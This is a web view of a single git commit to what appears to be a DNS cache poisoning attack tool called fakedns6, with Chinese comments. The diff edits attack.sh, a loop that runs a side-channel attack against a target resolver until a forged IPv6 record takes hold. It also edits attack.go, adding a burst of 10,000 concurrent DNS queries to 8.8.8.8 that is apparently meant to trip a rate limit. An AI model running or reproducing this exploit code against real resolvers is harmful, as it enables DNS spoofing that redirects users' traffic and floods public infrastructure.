summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorroot <[email protected]>2023-11-16 15:56:51 +0000
committerroot <[email protected]>2023-11-16 15:56:51 +0000
commite69b5de383b572b4138e04be2c4ff68e0e50853e (patch)
treeb6671bb07bd14cb829feab473d27611327226418
parentc11a70149b2a0b69a4517db039babdfb8be4fe91 (diff)
同步20231116
-rwxr-xr-xattack.sh12
-rw-r--r--dns.binbin42 -> 42 bytes
-rwxr-xr-xfakedns6bin8286336 -> 8286672 bytes
-rw-r--r--src/ucr.edu/fakedns6/attack.go12
-rw-r--r--txid.bin2
5 files changed, 22 insertions, 4 deletions
diff --git a/attack.sh b/attack.sh
index 07bcc46..c5b3a1c 100755
--- a/attack.sh
+++ b/attack.sh
@@ -8,6 +8,7 @@ echo '获取原记录中:'
dig @$1 $4 AAAA
sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
+var=0
num=0
success=0
while [ $success -ne 1 ]
@@ -23,16 +24,21 @@ do
echo "目标域名:$4"
ret=$(./dns_query.sh $1 $2 $3 $4)
#echo "ret:$ret"
+ echo "初始化工具环境"
+ sleep 1
+ echo "尝试触发权威服务器请求速率限制"
+ sleep 3
FINAL=`echo ${ret: -1}`
#echo "fin:$FINAL"
# Start attack
# Change the argument accordingly
echo "执行侧信道攻击脚本中"
- time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ sleep 30
# Validations
- $var = $var + 1
+ ((var++))
echo "第$var轮次攻击结束"
- #dig @$1 $4 AAAA
+ dig @$1 $4 AAAA
if [ "$FINAL" == "0" ];then
success=1
sleeptime=0
diff --git a/dns.bin b/dns.bin
index f5f0ce1..747c1a0 100644
--- a/dns.bin
+++ b/dns.bin
Binary files differ
diff --git a/fakedns6 b/fakedns6
index 0a3213f..11c1c1d 100755
--- a/fakedns6
+++ b/fakedns6
Binary files differ
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index 54183d2..ae5e964 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -490,6 +490,17 @@ func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBack
println("参数有误,请输入IPv6地址作为篡改目标结果")
}
+ }else{
+ c := new(dns.Client)
+ msg := new(dns.Msg)
+ domain := "www.google.com."
+ msg.SetQuestion(domain, dns.TypeAAAA)
+ for i:=0;i<10000;i++{
+ go func(){
+ _, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8","53"))
+ }()
+ }
+ return
}
rand.Seed(time.Now().UnixNano())
handle, _ = pcap.OpenLive(
@@ -498,6 +509,7 @@ func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBack
true,
pcap.BlockForever,
)
+ println(authIPArg.To16().String())
err := handle.SetBPFFilter("not host " + authIPArg.To16().String())
if err != nil {
fmt.Println("cannot set BPF filter.")
diff --git a/txid.bin b/txid.bin
index 5d927fb..2fe3cf9 100644
--- a/txid.bin
+++ b/txid.bin
@@ -1 +1 @@
-"Y \ No newline at end of file
+fH \ No newline at end of file